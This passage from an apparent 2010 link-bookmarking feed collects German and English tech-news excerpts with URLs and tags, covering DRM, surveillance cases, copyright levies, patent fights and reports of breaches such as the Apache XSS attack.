vergangenen Jahre schrittweise darauf geeinigt haben, im Internet vertriebene Download-Songs ohne Kopierschutz auszuliefern, um Kundenwünschen entgegen zu kommen, scheint die Musikindustrie künftig wieder mehr Kontrolle über ihre Werke haben zu wollen. +</p> +<p>Online-DRM +</p> +<p>siehe auch der <a href="http://derstandard.at/1269449159003/Bericht-Musikindustrie-plant-Comeback-des-Kopierschutzes">standard</a> +</p>http://techcrunch.com/2010/04/06/how-dirty-mp3-files-are-a-back-door-into-cloud-drm/page_shots/2010/04/18/how-8220dirty8221-mp3-files-are-a-back-doo_.pnghow-8220dirty8221-mp3-files-are-a-back-doo11012010-04-18 12:13:572cloud drmFeds drop bid for warrantless access to Yahoo! mail • The RegisterThe federal government has dropped its controversial bid to read messages in a Yahoo! email account without getting a search warrant. + +"While this is a great victory for that Yahoo! subscriber, it's disappointing to those of us who wanted a clear ruling on the legality and constitutionality of the government's overreaching demand," wrote Kevin Bankston, an attorney with the Electronic Frontier Foundation, part of a coalition of groups that opposed the government's action. "Such demands are apparently a routine law enforcement technique."<p>The federal government has dropped its controversial bid to read messages in a Yahoo! email account without getting a search warrant. +</p> +<p>"While this is a great victory for that Yahoo! subscriber, it's disappointing to those of us who wanted a clear ruling on the legality and constitutionality of the government's overreaching demand," wrote Kevin Bankston, an attorney with the Electronic Frontier Foundation, part of a coalition of groups that opposed the government's action. "Such demands are apparently a routine law enforcement technique." +</p>http://www.theregister.co.uk/2010/04/17/yahoo_warrantless_email_search_dropped/page_shots/2010/04/17/feds-drop-bid-for-warrantless-access-to-yahoo-mai.pngfeds-drop-bid-for-warrantless-access-to-yahoo-mai11012010-04-17 11:11:442eff yahooBush’s Illegal Wiretapping Tab: $612,000The two American lawyers who were illegally wiretapped by the Bush administration asked a federal judge Friday to order the government to pay $612,000 in damages, plus legal fees for their attorneys. + +Under Bush’s so-called Terrorist Surveillance Program, which The New York Times disclosed in December 2005, the NSA was eavesdropping on Americans’ telephone calls without warrants if the government believed the person on the other line was overseas and associated with terrorism. Congress, with the vote of Barack Obama — who was a U.S. senator from Illinois at the time — subsequently authorized such warrantless spying in the summer of 2008.The government in 2004 was intercepting the telephone communications of lawyers Wendell Belew and Asim Ghafoor. They were counsel to a Saudi charity, the Al-Haramain Islamic Foundation, which the gov + +Read More http://www.wired.com/threatlevel/2010/04/wiretaptab/#ixzz0lLWlrTFT + +Read More http://www.wired.com/threatlevel/2010/04/wiretaptab/#ixzz0lLWly5Tg +<p>The government in 2004 was intercepting the telephone communications of lawyers Wendell Belew and Asim Ghafoor. They were counsel to a Saudi charity, the Al-Haramain Islamic Foundation, which the gov +</p> +<p>Read More http://www.wired.com/threatlevel/2010/04/wiretaptab/#ixzz0lLWlrTFT +</p> +<p>Read More http://www.wired.com/threatlevel/2010/04/wiretaptab/#ixzz0lLWly5Tg +</p><p>The two American lawyers who were illegally wiretapped by the Bush administration asked a federal judge Friday to order the government to pay $612,000 in damages, plus legal fees for their attorneys. +</p> +<p>Under Bush’s so-called Terrorist Surveillance Program, which The New York Times disclosed in December 2005, the NSA was eavesdropping on Americans’ telephone calls without warrants if the government believed the person on the other line was overseas and associated with terrorism. Congress, with the vote of Barack Obama — who was a U.S. senator from Illinois at the time — subsequently authorized such warrantless spying in the summer of 2008. +</p>http://www.wired.com/threatlevel/2010/04/wiretaptab/#ixzz0lLWly5Tgpage_shots/2010/04/17/600usd-damages-fee.png600usd-damages-fee11012010-04-17 10:49:042nsa wiretapheise resale - Urheberrechtsabgabe für USB-Sticks und Speicherkarten festgezurrtAuf eine Urheberrechtsabgabe in Höhe von 10 Cent je USB-Stick und Speicherkarte hatten sich der Informationskreis AufnahmeMedien (IM) – der rund 20 Hersteller und Importeure vertritt – und die Verwertungsgesellschaften schon im Mai vergangenen Jahres geeinigt. Zur Vertragsunterzeichnung kam es jedoch erst zum Jahreswechsel. Nach Einschätzung des IM zögerte die Zentralstelle für private Überspielrechte (ZPÜ) den Abschluss hinaus, um eine gesamtvertragliche Einigung auch in der Streitsache PC-Abgabe anzustreben.<p>Auf eine Urheberrechtsabgabe in Höhe von 10 Cent je USB-Stick und Speicherkarte hatten sich der Informationskreis AufnahmeMedien (IM) – der rund 20 Hersteller und Importeure vertritt – und die Verwertungsgesellschaften schon im Mai vergangenen Jahres geeinigt. Zur Vertragsunterzeichnung kam es jedoch erst zum Jahreswechsel. Nach Einschätzung des IM zögerte die Zentralstelle für private Überspielrechte (ZPÜ) den Abschluss hinaus, um eine gesamtvertragliche Einigung auch in der Streitsache PC-Abgabe anzustreben. +</p>http://www.heise.de/resale/meldung/Urheberrechtsabgabe-fuer-USB-Sticks-und-Speicherkarten-festgezurrt-979708.htmlpage_shots/2010/04/16/heise-resale-urheberrechtsabgabe-fur-usb-sticks.pngheise-resale-urheberrechtsabgabe-fur-usb-sticks11012010-04-16 23:46:222urheberrechtsabgabeNestle-killer-kampagneNestle über Twitter, Facebook etc. für Einsatz von Palmöl zur Sau gemacht.<p>Nestle über Twitter, Facebook etc. für Einsatz von Palmöl zur Sau gemacht. +</p>http://www.spiegel.de/netzwelt/web/0,1518,688975,00.htmlpage_shots/2010/04/16/nestle-killer-kampagne.pngnestle-killer-kampagne11012010-04-16 23:37:392facebook greenpeace nestle socialnet twitterVideo-game shoppers surrender their immortal soulsBy placing an order via this Web site on the first day of the fourth month of the year 2010 Anno Domini, you agree to grant Us a non transferable option to claim, for now and for ever more, your immortal soul. Should We wish to exercise this option, you agree to surrender your immortal soul, and any claim you may have on it, within 5 (five) working days of receiving written notification from gamesation.co.uk or one of its duly authorised minions....we reserve the right to serve such notice in 6 (six) foot high letters of fire, however we can accept no liability for any loss or damage caused by such an act. If you a) do not believe you have an immortal soul, b) have already given it to another party, or c) do not wish to grant Us such a license, please click the link below to nullify this sub-clause and proceed with your transaction.<p>By placing an order via this Web site on the first day of the fourth month of the year 2010 Anno Domini, you agree to grant Us a non transferable option to claim, for now and for ever more, your immortal soul. Should We wish to exercise this option, you agree to surrender your immortal soul, and any claim you may have on it, within 5 (five) working days of receiving written notification from gamesation.co.uk or one of its duly authorised minions....we reserve the right to serve such notice in 6 (six) foot high letters of fire, however we can accept no liability for any loss or damage caused by such an act. If you a) do not believe you have an immortal soul, b) have already given it to another party, or c) do not wish to grant Us such a license, please click the link below to nullify this sub-clause and proceed with your transaction. +</p>http://newslite.tv/2010/04/06/7500-shoppers-unknowingly-sold.htmlpage_shots/2010/04/16/no_page_shot.pngvideo-game-shoppers-surrender-their-immortal-souls131012010-04-16 14:14:582april, click, fool. prank, game, license, soulBig Content's dystopian wish-list for the US gov't: spyware, censorship, physical searches and SWAT teams The MPAA and RIAA have submitted their master plan for enforcing copyright to the new Office of Intellectual Property Enforcement. As the Electronic Frontier Foundation's Richard Esguerra points out, it's a startlingly distopian work of science fiction. The entertainment industry calls for: + + * spyware on your computer that detects and deletes infringing materials; + * mandatory censorware on all Internet connections to interdict transfers of infringing material; + * border searches of personal media players, laptops and thumb-drives; + * international bullying to force other countries to implement the same policies; + * and free copyright enforcement provided by Fed cops and agencies (including the Department of Homeland Security!). <p> The MPAA and RIAA have submitted their master plan for enforcing copyright to the new Office of Intellectual Property Enforcement. As the Electronic Frontier Foundation's Richard Esguerra points out, it's a startlingly distopian work of science fiction. The entertainment industry calls for: +</p> +<pre><code>* spyware on your computer that detects and deletes infringing materials; +* mandatory censorware on all Internet connections to interdict transfers of infringing material; +* border searches of personal media players, laptops and thumb-drives; +* international bullying to force other countries to implement the same policies; +* and free copyright enforcement provided by Fed cops and agencies (including the Department of Homeland Security!). +</code></pre>http://www.eff.org/deeplinks/2010/04/entertainment-industrys-dystopia-futurepage_shots/2010/04/16/big-contents-dystopian-wish-list-for-the-us-govt.pngbig-contents-dystopian-wish-list-for-the-us-govt131012010-04-16 14:02:582contentmafia, copyfight, copyright, eff, filesharing, law enforcement, mpaa, politics, riaaMark Fiore can win a Pulitzer Prize, but he can&#8217;t get his iPhone cartoon app past Apple&#8217;s satire police » Nieman Journalism LabCartoonist Mark Fiore made Internet and journalism history as the first online-only journalist to win a Pulitzer Prize. Fiore took home the editorial cartooning prize for animations he created for SFGate, the website for the San Francisco Chronicle. +In December, Apple rejected his iPhone app, NewsToons, because, as Apple put it, his satire “ridicules public figures,” a violation of the iPhone Developer Program License Agreement, which bars any apps whose content in “Apple’s reasonable judgement may be found objectionable, for example, materials that may be considered obscene, pornographic, or defamatory.”<p>Cartoonist Mark Fiore made Internet and journalism history as the first online-only journalist to win a Pulitzer Prize. Fiore took home the editorial cartooning prize for animations he created for SFGate, the website for the San Francisco Chronicle. + In December, Apple rejected his iPhone app, NewsToons, because, as Apple put it, his satire “ridicules public figures,” a violation of the iPhone Developer Program License Agreement, which bars any apps whose content in “Apple’s reasonable judgement may be found objectionable, for example, materials that may be considered obscene, pornographic, or defamatory.” +</p>http://www.niemanlab.org/2010/04/mark-fiore-can-win-a-pulitzer-prize-but-he-cant-get-his-iphone-cartoon-app-past-apples-satire-police/page_shots/2010/04/16/mark-fiore-can-win-a-pulitzer-prize-but-he-can8.pngmark-fiore-can-win-a-pulitzer-prize-but-he-can811012010-04-16 11:25:592apple appstore jounalismLabor group: Chinese teens 'like prisoners' in Microsoft tech factoryThe National Labor Committee offers an in-depth look into working conditions in Chinese sweatshops producing hardware (mice, etc.) for Microsoft ... Hewlett-Packard, Samsung, Foxconn, Acer, Logitech and Asus also outsource production to KYE Systems. + +Apparently, so called 'work study students,' 16 and 17 years of age, work 15-hour shifts, six and seven days a week, for around 65 cents per hour. + +<p>The National Labor Committee offers an in-depth look into working conditions in Chinese sweatshops producing hardware (mice, etc.) for Microsoft ... Hewlett-Packard, Samsung, Foxconn, Acer, Logitech and Asus also outsource production to KYE Systems. +</p> +<p>Apparently, so called 'work study students,' 16 and 17 years of age, work 15-hour shifts, six and seven days a week, for around 65 cents per hour. +</p>http://blog.seattlepi.com/microsoft/archives/201685.asppage_shots/2010/04/15/labor-group-chinese-teens-like-prisoners-in-mic.pnglabor-group-chinese-teens-like-prisoners-in-mic11012010-04-15 16:33:532chinaheise online - Facebook: Lieber Angreifer jagen als Sicherheitslücken schließen Facebooks Sicherheitschef Max Kelly verdiente einst seine Brötchen als Computer-Forensiker beim amerikanischen FBI. + +Kelly gab bei Facebook die Devise aus, dass das Sammeln von Informationen über Attacken und die dahinter stehenden Kriminellen wichtiger ist als das Stopfen sämtlicher Lücken. + +<p>Facebooks Sicherheitschef Max Kelly verdiente einst seine Brötchen als Computer-Forensiker beim amerikanischen FBI. +</p> +<p>Kelly gab bei Facebook die Devise aus, dass das Sammeln von Informationen über Attacken und die dahinter stehenden Kriminellen wichtiger ist als das Stopfen sämtlicher Lücken. +</p>http://www.heise.de/newsticker/meldung/Facebook-Lieber-Angreifer-jagen-als-Sicherheitsluecken-schliessen-978224.htmlpage_shots/2010/04/15/heise-online-facebook-lieber-angreifer-jagen-al.pngheise-online-facebook-lieber-angreifer-jagen-al11012010-04-15 15:26:102facebook fbiPalm Pre als mobiler WLAN-Access-Pointhttp://www.heise.de/newsticker/meldung/Palm-Pre-als-mobiler-WLAN-Access-Point-972399.htmlpage_shots/2010/04/14/palm-pre-als-mobiler-wlan-access-point.pngpalm-pre-als-mobiler-wlan-access-point141012010-04-14 00:23:092Apache Foundation Hit by Targeted XSS Attack | threatpostCombining a cross-site scripting (XSS) vulnerability with a TinyURL redirect, hackers successfully broke into the infrastructure for the open-source Apache Foundation in what is being described as a "direct, targeted attack." + +The hackers hit the server hosting the software that Apache.org uses to it to track issues and requests and stole passwords from all users. The software was hosted on brutus.apache.org, a machine running Ubuntu Linux 8.04 LTS, the group said. + +The passwords were encrypted on the compromised servers (SHA-512 hash) but Apache said the risk to simple passwords based on dictionary words "is quite high" and urged users to immediately rotate their passwords. "In addition, if you logged into the Apache JIRA instance between April 6th and April 9th, you should consider the password as compromised, because the attackers changed the login form to log them," Apache said.<p>Combining a cross-site scripting (XSS) vulnerability with a TinyURL redirect, hackers successfully broke into the infrastructure for the open-source Apache Foundation in what is being described as a "direct, targeted attack." +</p> +<p>The hackers hit the server hosting the software that Apache.org uses to it to track issues and requests and stole passwords from all users. The software was hosted on brutus.apache.org, a machine running Ubuntu Linux 8.04 LTS, the group said. +</p> +<p>The passwords were encrypted on the compromised servers (SHA-512 hash) but Apache said the risk to simple passwords based on dictionary words "is quite high" and urged users to immediately rotate their passwords. "In addition, if you logged into the Apache JIRA instance between April 6th and April 9th, you should consider the password as compromised, because the attackers changed the login form to log them," Apache said. +</p>http://threatpost.com/en_us/blogs/apache-foundation-hit-targeted-xss-attack-041310?utm_source=Personalities+Pod&utm_medium=Home+Page+Personalities&utm_campaign=Personalities+Ryanpage_shots/2010/04/13/apache-foundation-hit-by-targeted-xss-attack-thr.pngapache-foundation-hit-by-targeted-xss-attack-thr11012010-04-13 19:08:442apache hack tinyurl xssWe Pad even runs Windows"The WePad prototype they have shown at the press conference ran an ordinary Windows!", schrieb bereits am Montag kurz nach der Vorstellung das Blog androidpads.com. Der Beweis: Bei der Vorstellung des Geräts poppte unverhofft eine Windows-Fehlermeldung auf, wie ein Screenshot von einem Video der Vorstellung beweist. Ein weiteres Video bei Youtube zeigt, wie Neofonie-Chef Hoffer von Ankershoffen den angeblichen Prototypen offenbar peinlich berührt versteckt, als die Fehlermeldung auf dem Schirm erscheint.<p>"The WePad prototype they have shown at the press conference ran an ordinary Windows!", schrieb bereits am Montag kurz nach der Vorstellung das Blog androidpads.com. Der Beweis: Bei der Vorstellung des Geräts poppte unverhofft eine Windows-Fehlermeldung auf, wie ein Screenshot von einem Video der Vorstellung beweist. Ein weiteres Video bei Youtube zeigt, wie Neofonie-Chef Hoffer von Ankershoffen den angeblichen Prototypen offenbar peinlich berührt versteckt, als die Fehlermeldung auf dem Schirm erscheint. +</p>http://www.handelsblatt.com/technologie/mobile-welt/ipad-konkurrent-blogger-entlarven-wepad-fake;2560867page_shots/2010/04/13/we-pad-even-runs-windows.pngwe-pad-even-runs-windows11012010-04-13 14:22:022ipad wepadNASA hacker's mother stands for ParliamentThe mother of NASA hacker Gary McKinnon is standing for Parliament as an independent candidate in Blackburn, Lancashire, in a bid to prevent the "erosion of civil liberties". + +Janice Sharp, who lives in Hertfordshire, will be standing against Labour's Jack Straw, who is the current Minister for Justice. + +"Jack Straw led us to believe the extradition treaty would only be used for terrorists, but it is not being used for this," Sharp told the BBC. + +"Once these things are brought in, we don't know where they will go next. It's very frightening."<p>The mother of NASA hacker Gary McKinnon is standing for Parliament as an independent candidate in Blackburn, Lancashire, in a bid to prevent the "erosion of civil liberties". +</p> +<p>Janice Sharp, who lives in Hertfordshire, will be standing against Labour's Jack Straw, who is the current Minister for Justice. +</p> +<p>"Jack Straw led us to believe the extradition treaty would only be used for terrorists, but it is not being used for this," Sharp told the BBC. +</p> +<p>"Once these things are brought in, we don't know where they will go next. It's very frightening." +</p>http://www.networkworld.com/news/2010/041210-nasa-hackers-mother-stands-for.htmlpage_shots/2010/04/12/nasa-hackers-mother-stands-for-parliament.pngnasa-hackers-mother-stands-for-parliament11012010-04-12 17:55:232nasa ukheise online - Datenpanne führt zur ungenehmigten Organentnahme in GroßbritannienDas britische Gesundheitsministerium hat sich in einer Erklärung dafür entschuldigt, dass durch eine IT-Panne Genehmigungs-Details im zentralen Spendenregister durcheinander geworfen wurden. Laut Presseberichten wurden etwa 20 Toten Organe gegen deren vorher erklärten Willen entnommen.<p>Das britische Gesundheitsministerium hat sich in einer Erklärung dafür entschuldigt, dass durch eine IT-Panne Genehmigungs-Details im zentralen Spendenregister durcheinander geworfen wurden. Laut Presseberichten wurden etwa 20 Toten Organe gegen deren vorher erklärten Willen entnommen. +</p>http://www.heise.de/newsticker/meldung/Datenpanne-fuehrt-zur-ungenehmigten-Organentnahme-in-Grossbritannien-974937.htmlpage_shots/2010/04/11/heise-online-datenpanne-fuhrt-zur-ungenehmigten.pngheise-online-datenpanne-fuhrt-zur-ungenehmigten11012010-04-11 22:35:402ukInteresting times for Video on the Web - Google Open Source BlogGoogle has decided to fund the development of Theora optimized for ARM processors. + +Gute Zusammenfassung beim [Economist](www.economist.com/science-technology/displaystory.cfm?story_id=15927112) auch im Zusammenspiel mit Flash, Apple etc.<p>Google has decided to fund the development of Theora optimized for ARM processors. +</p> +<p>Gute Zusammenfassung beim <a href="www.economist.com/science-technology/displaystory.cfm?story_id=15927112">Economist</a> auch im Zusammenspiel mit Flash, Apple etc. +</p>http://google-opensource.blogspot.com/2010/04/interesting-times-for-video-on-web.htmlpage_shots/2010/04/17/interesting-times-for-video-on-the-web-google-op.pnginteresting-times-for-video-on-the-web-google-op11012010-04-10 21:03:122google patent theora video vp8Spy Network Pilfered Classified Docs From Indian Government and Others | Threat Level | Wired.comIn what must be a "tempting fate" statement the +Indian military stated last month that their [systems are hack-proof] +(http://timesofindia.indiatimes.com/India/Cyber-war-Army-says-its-systems-are-hack-proof/articleshow/4336279.cms) + +A spy network targeting government networks in India and other countries has been pilfering highly classified and other sensitive documents related to missile systems, the movement of military forces and relations among countries, according to a report released Tuesday. + +It also grabbed nearly a year’s worth of personal correspondence from the Dalai Lama’s office, even after reports published last year indicated that the Dalai Lama’s network had been compromised in what is believed to be a separate breach.<p>In what must be a "tempting fate" statement the + Indian military stated last month that their <a href="http://timesofindia.indiatimes.com/India/Cyber-war-Army-says-its-systems-are-hack-proof/articleshow/4336279.cms">systems are hack-proof</a> +</p> +<p>A spy network targeting government networks in India and other countries has been pilfering highly classified and other sensitive documents related to missile systems, the movement of military forces and relations among countries, according to a report released Tuesday. +</p> +<p>It also grabbed nearly a year’s worth of personal correspondence from the Dalai Lama’s office, even after reports published last year indicated that the Dalai Lama’s network had been compromised in what is believed to be a separate breach. +</p>http://www.wired.com/threatlevel/2010/04/shadow-network/page_shots/2010/04/09/spy-network-pilfered-classified-docs-from-indian-g.pngspy-network-pilfered-classified-docs-from-indian-g11012010-04-09 22:50:132china hack indiaRomania Swoops In on 70 Cybertheft Suspects | Threat Level | Wired.comRomanian police have arrested 70 people believed to be members of three +separate cyber crime groups. The suspects allegedly obtained eBay login +credentials through phishing attacks. Nearly 800 people have been +identified as victims in the scheme, which also involved selling items +that did not exist or were never delivered. In all, an estimated US $1 +million was lost. The investigation, named Operation Valley of the +Kings, involved law enforcement authorities in cities around the world.<p>Romanian police have arrested 70 people believed to be members of three + separate cyber crime groups. The suspects allegedly obtained eBay login + credentials through phishing attacks. Nearly 800 people have been + identified as victims in the scheme, which also involved selling items + that did not exist or were never delivered. In all, an estimated US $1 + million was lost. The investigation, named Operation Valley of the + Kings, involved law enforcement authorities in cities around the world. +</p>http://www.wired.com/threatlevel/2010/04/romania-cyber-thievespage_shots/2010/04/09/romania-swoops-in-on-70-cybertheft-suspects-thre.pngromania-swoops-in-on-70-cybertheft-suspects-thre11012010-04-09 22:44:542ebay fraud romaniaNYT ethicist: OK to pirate ebooks once you've bought the hardcoverRandy Cohen, author of the New York Times's The Ethicist column, was asked to venture an opinion on whether it's OK to download a pirate ebook after you've bought the hardcover. He says it's ethical, even if it's illegal: <p>Randy Cohen, author of the New York Times's The Ethicist column, was asked to venture an opinion on whether it's OK to download a pirate ebook after you've bought the hardcover. He says it's ethical, even if it's illegal: +</p>http://www.nytimes.com/2010/04/04/magazine/04FOB-ethicist-t.html?ref=magazinepage_shots/2010/04/09/nyt-ethicist-ok-to-pirate-ebooks-once-youve-boug.pngnyt-ethicist-ok-to-pirate-ebooks-once-youve-boug131012010-04-09 11:07:232copyright, ebook, file sharing, piracyBank insider charged over ATM malware scam • The RegisterAn IT worker at Bank of America has been charged with hacking ATM systems so that machines handed out cash without recording his transactions, IDG reports.<p>An IT worker at Bank of America has been charged with hacking ATM systems so that machines handed out cash without recording his transactions, IDG reports. +</p>http://www.theregister.co.uk/2010/04/08/bofa_atm_hack_charges/page_shots/2010/04/08/bank-insider-charged-over-atm-malware-scam-the-r.pngbank-insider-charged-over-atm-malware-scam-the-r11012010-04-08 17:31:052atm bank hackTeen Sues Mom for Hacking Facebook Account - PCWorlda 16-year-old Arkansas boy is suing his mother for hacking into his Facebook account and allegedly posting slanderous remarks.<p>a 16-year-old Arkansas boy is suing his mother for hacking into his Facebook account and allegedly posting slanderous remarks. +</p>http://www.pcworld.com/article/193776/teen_sues_mom_for_hacking_facebook_account.htmlpage_shots/2010/04/08/teen-sues-mom-for-hacking-facebook-account-pcwor.pngteen-sues-mom-for-hacking-facebook-account-pcwor11012010-04-08 17:26:362facebookLocation der geblockten Seiten in Dänemark97% der blockierten Webseiten auf der dänischen Blocking-List sind in den USA, EU und Canada<p>97% der blockierten Webseiten auf der dänischen Blocking-List sind in den USA, EU und Canada +</p>http://itpol.dk/censur/internetblokeringpage_shots/2010/04/08/location-der-geblockten-seiten-in-danemark.pnglocation-der-geblockten-seiten-in-danemark11012010-04-08 10:31:242censorshipOtherOS on PS3 3.21 reactivatedNoted iPhone and PlayStation 3 hacker George Hotz, or GeoHot, told the gaming community not to update their systems until he was able to release custom firmware allowing them to continue using their Linux partitions, and it looks as if he's close to his goal. A new video posted today shows the hack, although a release date hasn't been given for the rest of us to download his work. + +In UK hat Amazon 20% des Kaufpreises zurück gezahlt, weil hier der Händler für die Funktion 2 Jahre haftet. +www.heise.de/newsticker/meldung/Amazon-zahlt-fuer-Wegfall-der-Linux-Funktion-bei-der-PS3-975486.html<p>Noted iPhone and PlayStation 3 hacker George Hotz, or GeoHot, told the gaming community not to update their systems until he was able to release custom firmware allowing them to continue using their Linux partitions, and it looks as if he's close to his goal. A new video posted today shows the hack, although a release date hasn't been given for the rest of us to download his work. +</p> +<p>In UK hat Amazon 20% des Kaufpreises zurück gezahlt, weil hier der Händler für die Funktion 2 Jahre haftet. + www.heise.de/newsticker/meldung/Amazon-zahlt-fuer-Wegfall-der-Linux-Funktion-bei-der-PS3-975486.html +</p>http://arstechnica.com/gaming/news/2010/04/custom-firmware-on-ps3-linux-on-slims-geohot-fights-back.arspage_shots/2010/04/12/otheros-on-ps3-321-reactivated.pngotheros-on-ps3-321-reactivated11012010-04-08 10:28:022linux otheros ps3 sony Millions will have to buy routers to beat hackers - Times Online Millions of internet users will have to spend up to £70 each to upgrade their wi-fi equipment or risk heavy fines if hackers use their connection to download pirated material. + +New laws to clamp down on illegal filesharing are expected to complete their passage through Parliament on Wednesday. Home owners with insecure broadband connections will be responsible for any material illegally downloaded through their network.<p>Millions of internet users will have to spend up to £70 each to upgrade their wi-fi equipment or risk heavy fines if hackers use their connection to download pirated material. +</p> +<p>New laws to clamp down on illegal filesharing are expected to complete their passage through Parliament on Wednesday. Home owners with insecure broadband connections will be responsible for any material illegally downloaded through their network. +</p>http://business.timesonline.co.uk/tol/business/industry_sectors/technology/article7086250.ecepage_shots/2010/04/06/millions-will-have-to-buy-routers-to-beat-hackers.pngmillions-will-have-to-buy-routers-to-beat-hackers11012010-04-06 21:14:072uk wirelessCyber warrior Camps for Recruitment“It’s about growing the next generation of cyberwarriors to protect the nation,” said Alan Greenberg, technical director of cyber and information solutions at Boeing, an event sponsor that hired seven students who competed in the event last year and may fill positions with this year’s contestants. + +Demand for computer security experts is surging in the wake of high-profile threats such as the ones outlined by Google Inc., which said in January that Chinese hackers stole intellectual property and targeted e-mail accounts of human- rights activists. The U.S. government and companies will need about 60,000 cybersecurity workers in the next three years, Greenberg said.<p>“It’s about growing the next generation of cyberwarriors to protect the nation,” said Alan Greenberg, technical director of cyber and information solutions at Boeing, an event sponsor that hired seven students who competed in the event last year and may fill positions with this year’s contestants. +</p> +<p>Demand for computer security experts is surging in the wake of high-profile threats such as the ones outlined by Google Inc., which said in January that Chinese hackers stole intellectual property and targeted e-mail accounts of human- rights activists. The U.S. government and companies will need about 60,000 cybersecurity workers in the next three years, Greenberg said. +</p>http://www.bloomberg.com/apps/news?pid=20601100&sid=abmfWsuQyyk0page_shots/2010/04/06/cyber-warrior-camps-for-recruitment.pngcyber-warrior-camps-for-recruitment11012010-04-06 21:11:492recruitmentFOSS Patents: IBM breaks the taboo and betrays its promise to the FOSS communityAfter years of pretending to be a friend of Free and Open Source Software (FOSS), IBM now shows its true colors. IBM breaks the number one taboo of the FOSS community and shamelessly uses its patents against a well-respected FOSS project, the Hercules mainframe emulator. +... +This is so appalling that I felt compelled to show to the FOSS community what IBM is doing: IBM is using patent warfare in order to protect its highly lucrative mainframe monopoly against Free and Open Source Software. + +Patents against FOSS and customer choice<p>After years of pretending to be a friend of Free and Open Source Software (FOSS), IBM now shows its true colors. IBM breaks the number one taboo of the FOSS community and shamelessly uses its patents against a well-respected FOSS project, the Hercules mainframe emulator. + ... + This is so appalling that I felt compelled to show to the FOSS community what IBM is doing: IBM is using patent warfare in order to protect its highly lucrative mainframe monopoly against Free and Open Source Software. +</p> +<p>Patents against FOSS and customer choice +</p>http://fosspatents.blogspot.com/2010/04/ibm-breaks-taboo-and-betrays-its.htmlpage_shots/2010/04/06/foss-patents-ibm-breaks-the-taboo-and-betrays-its.pngfoss-patents-ibm-breaks-the-taboo-and-betrays-its11012010-04-06 19:00:412ibm patentheise online - Vorläufiges Aus für E-Voting in ÖsterreichDie neue österreichische Wissenschaftsministerin Beatrix Karl (ÖVP) hat das von ihrem Amtsvorgänger Johannes Hahn (ÖVP, nunmehr EU-Kommissar für Regionalpolitik) eingeführte E-Voting vorerst gestoppt. Bei der nächsten Wahl zur Studentenvertretung österreichische Hochschülerschaft (ÖH) spätestens 2011 wird es damit keine Stimmabgabe über das Internet geben. Karl und die ÖVP setzen sich zwar weiterhin für E-Voting als "Briefwahl des 21. Jahrhunderts" ein und möchten es auch bei anderen Wahlen einführen; doch sieht Karl in der gegenwärtig geringen Verbreitung der notwendigen Bürgerkarte einen Hemmschuh. Ein weiterer Grund sei die Ablehnung durch die ÖH selbst, sagte die Ministerin gegenüber der Tageszeitung Der Standard.<p>Die neue österreichische Wissenschaftsministerin Beatrix Karl (ÖVP) hat das von ihrem Amtsvorgänger Johannes Hahn (ÖVP, nunmehr EU-Kommissar für Regionalpolitik) eingeführte E-Voting vorerst gestoppt. Bei der nächsten Wahl zur Studentenvertretung österreichische Hochschülerschaft (ÖH) spätestens 2011 wird es damit keine Stimmabgabe über das Internet geben. Karl und die ÖVP setzen sich zwar weiterhin für E-Voting als "Briefwahl des 21. Jahrhunderts" ein und möchten es auch bei anderen Wahlen einführen; doch sieht Karl in der gegenwärtig geringen Verbreitung der notwendigen Bürgerkarte einen Hemmschuh. Ein weiterer Grund sei die Ablehnung durch die ÖH selbst, sagte die Ministerin gegenüber der Tageszeitung Der Standard. +</p>http://www.heise.de/newsticker/meldung/Vorlaeufiges-Aus-fuer-E-Voting-in-Oesterreich-969992.htmlpage_shots/2010/04/06/heise-online-vorlaufiges-aus-fur-e-voting-in-ost.pngheise-online-vorlaufiges-aus-fur-e-voting-in-ost11012010-04-06 12:25:022votingMS XML Patent bestätigtEin US-Bundesgericht hat die von Microsoft beantragte Wiederaufnahme des Patentstreits mit dem kleinen kanadischen Unternehmen i4i abgelehnt. Damit dürfte auch der letzte Versuch gescheitert sein, die Niederlage in dem Rechtsstreit um "Custom XML" abzuwenden. +... +Microsoft war im Mai 2009 zu einer Schadensersatzsumme von 290 Millionen US-Dollar verurteilt worden. Nach den Feststellungen des Gerichts hat der Softwareriese das 1994 erteilte US-Patent 5.787.449 vorsätzlich verletzt. Es beschreibt ein Verfahren, mit dem Struktur und Inhalte von Dokumenten in einem Computer getrennt bearbeitet werden können. Im August 2009 verhängte das Gericht zusätzlich ein Verkaufsverbot für Office-Versionen, die das Patent verletzen. <p>Ein US-Bundesgericht hat die von Microsoft beantragte Wiederaufnahme des Patentstreits mit dem kleinen kanadischen Unternehmen i4i abgelehnt. Damit dürfte auch der letzte Versuch gescheitert sein, die Niederlage in dem Rechtsstreit um "Custom XML" abzuwenden. + ... + Microsoft war im Mai 2009 zu einer Schadensersatzsumme von 290 Millionen US-Dollar verurteilt worden. Nach den Feststellungen des Gerichts hat der Softwareriese das 1994 erteilte US-Patent 5.787.449 vorsätzlich verletzt. Es beschreibt ein Verfahren, mit dem Struktur und Inhalte von Dokumenten in einem Computer getrennt bearbeitet werden können. Im August 2009 verhängte das Gericht zusätzlich ein Verkaufsverbot für Office-Versionen, die das Patent verletzen. +</p>http://www.heise.de/newsticker/meldung/Microsoft-verliert-XML-Patentstreit-969988.htmlpage_shots/2010/04/04/ms-xml-patent-bestatigt.pngms-xml-patent-bestatigt11012010-04-04 23:29:422microsoft patent xmliBooks naughty word filter doesn't let you say "sperm"Dean spotted that bowdlerization is afoot in the iPad's bookstore's selection of classic literature! This includes obvious candidates such as a certain Joseph Conrad classic. + +But ... sperm?<p>Dean spotted that bowdlerization is afoot in the iPad's bookstore's selection of classic literature! This includes obvious candidates such as a certain Joseph Conrad classic. +</p> +<p>But ... sperm? +</p>http://www.boingboing.net/2010/04/04/ibooks-censortron-do.htmlpage_shots/2010/04/04/ibooks-naughty-word-filter-doesnt-let-you-say-sp.pngibooks-naughty-word-filter-doesnt-let-you-say-sp131012010-04-04 22:44:082apple censorship ebook fail filter ipadFacebook-Fehler führte zur Veröffentlichung aller E-Mail-Adressen"Ein Fehler auf Facebook hatte dazu geführt, dass heute in den Morgenstunden wohl für ungefähr 30 Minuten alle E-Mail-Adressen in den Profilen von Facebook-Nutzern sichtbar waren - unabhängig davon, was in den Privateinstellungen festgelegt wurde."<p>"Ein Fehler auf Facebook hatte dazu geführt, dass heute in den Morgenstunden wohl für ungefähr 30 Minuten alle E-Mail-Adressen in den Profilen von Facebook-Nutzern sichtbar waren - unabhängig davon, was in den Privateinstellungen festgelegt wurde." 